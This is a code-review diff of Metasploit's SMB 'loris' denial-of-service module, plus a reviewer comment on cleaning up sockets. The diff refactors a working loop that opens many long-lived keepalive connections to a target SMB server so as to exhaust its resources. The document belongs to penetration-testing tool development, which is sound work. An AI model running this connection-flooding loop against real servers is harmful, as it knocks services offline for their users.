modules/auxiliary/dos/smb/smb_loris.rb

```diff
@@ -55,39 +55,35 @@ def run(args)
 
   Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "
 
-  while true do
-    begin
-      sockets.delete_if do |s|
-        s.closed?
-      end
+  loop do
+    sockets.delete_if(&:closed?)
 
-      nsock = target.connect(timeout: 360)
-      nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
-      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
-      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
-      nsock.setsockopt(Socket::Option.linger(true, 60))
-      nsock.write(header.to_binary_s)
-      sockets << nsock
+    nsock = target.connect(timeout: 360)
+    nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
+    nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
+    nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
+    nsock.setsockopt(Socket::Option.linger(true, 60))
+    nsock.write(header.to_binary_s)
+    sockets << nsock
 
-      n_loops += 1
-      if  last_reported != sockets.length
-        if n_loops % 100 == 0
-          last_reported = sockets.length
-          Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
-        end
-      elsif n_loops % 1000 == 0
-        Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
+    n_loops += 1
+    if last_reported != sockets.length
+      if n_loops % 100 == 0
+        last_reported = sockets.length
+        Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
       end
-    rescue Interrupt
-      break
-      sockets.each &:close
-    rescue Errno::EMFILE
-      Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned
-      warned = true
-      sockets.slice(0).close
-    rescue Exception => e
-      Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
+    elsif n_loops % 1000 == 0
+      Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
     end
+  rescue Interrupt
+    sockets.each(&:close)
```

Comment:
Not a blocker: I don't think this super matters in the end since this will be in a sub process which should clean up these correctly